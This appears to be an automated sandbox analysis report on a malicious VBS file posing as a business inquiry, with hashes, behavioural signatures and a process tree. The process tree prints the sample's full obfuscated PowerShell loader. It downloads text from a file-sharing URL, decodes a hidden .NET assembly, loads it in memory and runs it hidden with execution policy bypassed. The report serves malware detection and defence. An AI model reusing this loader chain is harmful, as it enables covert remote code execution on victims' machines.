Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
10-11-2024 06:22
Static task
static1
Behavioral task
behavioral1
Sample
Inquiry HA-22-28199 22-077.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Inquiry HA-22-28199 22-077.vbs
Resource
win10v2004-20241007-en
General
-
Target
Inquiry HA-22-28199 22-077.vbs
-
Size
12KB
-
MD5
605abed3e1d7266ea35c8517b5961010
-
SHA1
4c35a1a9e7385b8216812f3c6ff73b23b1710d18
-
SHA256
394ce0420dc3786db150a630ceb90bac466bf4a3c3f1f792441fed6fb0b6dc34
-
SHA512
15ff74ef09974c51a36cd4197c45c3391dd76317c2d278a34c9df5adf3cbee41f6fc9cf25450d73f3e6f4e63f00c0e65d874f6b572421bf49611544d11467bbc
-
SSDEEP
192:bWyKzktunJRUyKzktJDlvgia0GONzU09iT0yFnVk03u3A/WeFW9tWHaFi:Cy44unfUy44dPlzNiKeFsin
Malware Config
Extracted
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
Signatures
-
Blocklisted process makes network request 4 IoCs
Processes:
WScript.exepowershell.exeflow pid process 3 2752 WScript.exe 4 2752 WScript.exe 8 2768 powershell.exe 9 2768 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 2608 powershell.exe 2768 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 3 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 2608 powershell.exe 2768 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2608 powershell.exe Token: SeDebugPrivilege 2768 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
WScript.exeWScript.exepowershell.exedescription pid process target process PID 2088 wrote to memory of 2752 2088 WScript.exe WScript.exe PID 2088 wrote to memory of 2752 2088 WScript.exe WScript.exe PID 2088 wrote to memory of 2752 2088 WScript.exe WScript.exe PID 2752 wrote to memory of 2608 2752 WScript.exe powershell.exe PID 2752 wrote to memory of 2608 2752 WScript.exe powershell.exe PID 2752 wrote to memory of 2608 2752 WScript.exe powershell.exe PID 2608 wrote to memory of 2768 2608 powershell.exe powershell.exe PID 2608 wrote to memory of 2768 2608 powershell.exe powershell.exe PID 2608 wrote to memory of 2768 2608 powershell.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Inquiry HA-22-28199 22-077.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CKguwyMRrmjEg.js"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aQBuAHYAbwBrAGUALQBFAFgAUABSAEUAUwBzAGkATwBuACAAKAAoACcAZQBEAHkAaQBtAGEAZwBlAFUAcgBsACAAPQAgAEUANQByAGgAdAB0AHAAcwA6AC8ALwAxADAAMQA3AC4AZgBpAGwAZQBtAGEAaQBsAC4AYwBvAG0ALwBhAHAAJwArACcAaQAvAGYAaQBsAGUALwBnAGUAdAA/AGYAaQBsAGUAawBlAHkAPQAyAEEAYQBfAGIAVwBvADkAUgBlAHUANAA1AHQANwBCAFUAMQBrAFYAZwBzAGQAOQBwAFQAOQBwAGcAUwBTAGwAdgBTAHQARwByAG4AVABJAEMAZgBGAGgAbQBUAEsAagAzAEwAQwA2AFMAUQB0AEkAYwBPACcAKwAnAGMAXwBUADMANQB3ACYAcABrAF8AdgBpAGQAPQBmAGQANABmADYAMQA0AGIAYgAyADAAJwArACcAOQBjADYAMgBjADEAJwArACcANwAzADAAOQA0ADUAMQA3ADYAYQAwADkAMAA0AGYAIABFADUAcgA7AGUARAAnACsAJwB5AHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBlAEQAeQBpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgAGUARAB5AHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKABlAEQAeQBpAG0AYQBnAGUAVQByAGwAKQA7AGUARAB5AGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkACcAKwAnAGkAbgBnACcAKwAnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAGUARAB5AGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7AGUARAB5AHMAdABhAHIAdABGAGwAYQBnACAAPQAgAEUANQByADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4ARQA1AHIAOwBlAEQAeQBlAG4AZABGAGwAYQBnACAAPQAgAEUANQByADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgBFADUAcgA7AGUARAB5AHMAdABhAHIAdABJAG4AZAAnACsAJwBlAHgAIAA9ACAAZQBEAHkAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAZQBEAHkAcwB0AGEAcgB0AEYAbABhAGcAKQA7AGUARAB5AGUAbgBkAEkAbgBkAGUAeAAgAD0AIABlAEQAeQBpAG0AYQBnAGUAVABlAHgAdAAuAEkAJwArACcAbgBkAGUAeABPAGYAKABlAEQAeQBlAG4AZABGAGwAYQBnACkAOwBlAEQAeQBzAHQAYQAnACsAJwByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAnACsAJwAgAGUARAB5AGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJwArACcAZQAnACsAJwBEAHkAcwB0AGEAcgB0AEkAbgBkAGUAeAA7AGUARAB5AHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIABlAEQAeQBzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAZQBEAHkAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAZQBEAHkAZQBuAGQASQBuAGQAZQB4ACAALQAgAGUARAB5AHMAdABhAHIAdABJAG4AZABlAHgAOwBlAEQAeQBiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgAGUAJwArACcARAB5AGkAbQBhAGcAZQBUACcAKwAnAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKABlAEQAeQBzAHQAYQByAHQASQBuAGQAZQB4ACwAIABlAEQAeQBiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAZQBEAHkAYgBhAHMAZQA2ADQAUgBlAHYAZQByAHMAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAZQBEAHkAJwArACcAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIABxAFoARwAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABlAEQAeQBfACAAfQApAFsALQAxAC4ALgAtACgAZQBEAHkAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAEwAZQBuAGcAdABoACkAXQA7AGUARAAnACsAJwB5AGMAJwArACcAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAJwArACcAUwB0AHIAaQBuAGcAKABlAEQAeQBiAGEAcwAnACsAJwBlADYANABSAGUAdgBlAHIAcwBlAGQAKQA7AGUARAB5AGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuACcAKwAnAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAZQBEAHkAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7AGUARAB5AHYAYQBpAE0AZQB0AGgAbwBkACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4AJwArACcASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKABFADUAcgBWAEEASQBFADUAJwArACcAcgApADsAJwArACcAZQBEAHkAdgBhAGkATQBlAHQAaABvAGQALgBJAG4AdgBvAGsAZQAoAGUARAB5AG4AdQBsAGwALAAgAEAAKABFADUAcgB0AHgAdAAuAGQAcwB0AGUAcAAvAHAAbwBwAC8AdQBlAC4AcAByAGcAeABhAG0AeQBnAHIAZQBuAGUALgBnAGkAZwAvAC8AOgBwAHQAdABoAEUANQByACwAIABFADUAcgBkAGUAcwBhAHQAaQB2AGEAZABvAEUANQByACwAIABFADUAcgBkAGUAcwBhAHQAaQB2AGEAZABvAEUANQByACwAIABFADUAcgBkAGUAcwBhAHQAaQB2AGEAZABvAEUANQByACwAIABFADUAcgBkAGUAcwBhAHQAaQB2AGEAZABvAEUANQByACwAIABFADUAJwArACcAcgAxAEUANQByACwAIABFADUAcgBPAG4AZQBEAHIAaQB2AGUAUwBlAHQAdQBwAEUANQByACwARQA1AHIAZABlAHMAYQB0AGkAdgBhAGQAbwBFADUAcgAsACAAJwArACcARQA1AHIAZAAnACsAJwBlAHMAYQB0AGkAdgBhAGQAbwBFADUAcgAsAEUANQByAGQAZQBzAGEAdABpAHYAYQBkAG8ARQA1AHIALABFADUAcgBkAGUAcwBhAHQAaQB2AGEAZABvAEUANQByACwARQA1AHIAZABlAHMAYQB0AGkAdgBhAGQAbwBFADUAcgAsAEUANQByADEARQA1AHIALABFADUAcgBkAGUAcwBhAHQAaQB2AGEAZABvAEUANQByACkAKQA7ACcAKQAuAFIAZQBQAEwAYQBDAGUAKAAoAFsAQwBIAEEAUgBdADYAOQArAFsAQwBIAEEAUgBdADUAMwArAFsAQwBIAEEAUgBdADEAMQA0ACkALABbAHMAVAByAGkATgBnAF0AWwBDAEgAQQBSAF0AMwA5ACkALgBSAGUAUABMAGEAQwBlACgAJwBxAFoARwAnACwAWwBzAFQAcgBpAE4AZwBdAFsAQwBIAEEAUgBdADEAMgA0ACkALgBSAGUAUABMAGEAQwBlACgAKABbAEMASABBAFIAXQAxADAAMQArAFsAQwBIAEEAUgBdADYAOAArAFsAQwBIAEEAUgBdADEAMgAxACkALAAnACQAJwApACkA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "invoke-EXPRESsiOn (('eDyimageUrl = E5rhttps://1017.filemail.com/ap'+'i/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcO'+'c_T35w&pk_vid=fd4f614bb20'+'9c62c1'+'730945176a0904f E5r;eD'+'ywebClient = New-Object System.Net.WebClient;eDyimageBytes = eDywebClient.DownloadData(eDyimageUrl);eDyimageText = [System.Text.Encod'+'ing'+']::UTF8.GetString(eDyimageBytes);eDystartFlag = E5r<<BASE64_START>>E5r;eDyendFlag = E5r<<BASE64_END>>E5r;eDystartInd'+'ex = eDyimageText.IndexOf(eDystartFlag);eDyendIndex = eDyimageText.I'+'ndexOf(eDyendFlag);eDysta'+'rtIndex -ge 0 -and'+' eDyendIndex -gt '+'e'+'DystartIndex;eDystartIndex += eDystartFlag.Length;eDybase64Length = eDyendIndex - eDystartIndex;eDybase64Command = e'+'DyimageT'+'ext.Substring(eDystartIndex, eDybase64Length);eDybase64Reversed = -join (eDy'+'base64Command.ToCharArray() qZG ForEach-Object { eDy_ })[-1..-(eDybase64Command.Length)];eD'+'yc'+'ommandBytes = [System.Convert]::FromBase64'+'String(eDybas'+'e64Reversed);eDyloadedAssembly = [System.Reflection.'+'Assembly]::Load(eDycommandBytes);eDyvaiMethod = [dnlib.IO.'+'Home].GetMethod(E5rVAIE5'+'r);'+'eDyvaiMethod.Invoke(eDynull, @(E5rtxt.dstep/pop/ue.prgxamygrene.gig//:ptthE5r, E5rdesativadoE5r, E5rdesativadoE5r, E5rdesativadoE5r, E5rdesativadoE5r, E5'+'r1E5r, E5rOneDriveSetupE5r,E5rdesativadoE5r, '+'E5rd'+'esativadoE5r,E5rdesativadoE5r,E5rdesativadoE5r,E5rdesativadoE5r,E5r1E5r,E5rdesativadoE5r));').RePLaCe(([CHAR]69+[CHAR]53+[CHAR]114),[sTriNg][CHAR]39).RePLaCe('qZG',[sTriNg][CHAR]124).RePLaCe(([CHAR]101+[CHAR]68+[CHAR]121),'$'))"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2768
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5ae40e08c0cba583f183151e7917d4947
SHA179bb3dd394e12d1e598b118ca29e60ad4eeb93b3
SHA256b43098cd18ce70e863d2bf5807ea36f95e03c5128ed2442f5886ea4ed4c6927c
SHA5125b4650fafda18f1fa194f4a0d0f30d8e06cfd86788852a47f7b105119da270206af389b034e47637e9eb21962645505ef9fb2645fbd42be775001cfa557ad598
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8F9A8R71UV3GSZ4RE4NQ.temp
Filesize7KB
MD5ec34e07bf983f9e9d692544fb8d8439b
SHA1422128d4c7ef24c7eab864eb6ff939a595179337
SHA256a40ac2f9c61a8f9a329328d6823f68d337335235c33f267d8368b471b16d3e50
SHA51234719ed2d949d5f2ded8da37aef24f0ee7f6f2b72eab88974d31233a3a1badb62c316756ec8da26c5be4fed4242d795d9971fe756104010fdd3f0a141b035487